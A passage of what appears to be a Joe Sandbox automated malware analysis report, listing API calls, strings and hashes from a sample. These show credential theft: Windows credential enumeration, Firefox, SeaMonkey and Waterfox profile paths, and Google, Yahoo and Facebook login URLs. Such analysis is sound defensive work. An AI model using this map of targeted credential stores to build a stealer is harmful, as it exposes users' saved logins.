                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                    • String ID: r!A
                                                                    • API String ID: 2791114272-628097481
                                                                    • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                    • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                    APIs
                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                    • API String ID: 62308376-4196376884
                                                                    • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                    • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A824
                                                                    • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                    • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID: C:\Windows\system32
                                                                    • API String ID: 669240632-2896066436
                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                    APIs
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                    • _wcsncoll.MSVCRT ref: 0040BE38
                                                                    • memset.MSVCRT ref: 0040BE91
                                                                    • memcpy.MSVCRT ref: 0040BEB2
                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                    • String ID:
                                                                    • API String ID: 3191383707-0
                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403CBF
                                                                    • memset.MSVCRT ref: 00403CD4
                                                                    • memset.MSVCRT ref: 00403CE9
                                                                    • memset.MSVCRT ref: 00403CFE
                                                                    • memset.MSVCRT ref: 00403D13
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403DDA
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                    • API String ID: 4039892925-11920434
                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403E50
                                                                    • memset.MSVCRT ref: 00403E65
                                                                    • memset.MSVCRT ref: 00403E7A
                                                                    • memset.MSVCRT ref: 00403E8F
                                                                    • memset.MSVCRT ref: 00403EA4
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403F6B
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                    • API String ID: 4039892925-2068335096
                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403FE1
                                                                    • memset.MSVCRT ref: 00403FF6
                                                                    • memset.MSVCRT ref: 0040400B
                                                                    • memset.MSVCRT ref: 00404020
                                                                    • memset.MSVCRT ref: 00404035
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 004040FC
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                    • API String ID: 4039892925-3369679110
                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 3510742995-2641926074
                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                    APIs
                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 004033B7
                                                                    • memcpy.MSVCRT ref: 004033D0
                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                    • String ID: $0.@
                                                                    • API String ID: 3030842498-1896041820
                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2941347001-0
                                                                    • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                    • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403C09
                                                                    • memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                    • API String ID: 1534475566-1174173950
                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                    APIs
                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                    • memset.MSVCRT ref: 00414C87
                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 71295984-2036018995
                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00414458
                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                    • String ID: "%s"
                                                                    • API String ID: 1343145685-3297466227
                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                    Strings
                                                                    Memory Dump Source
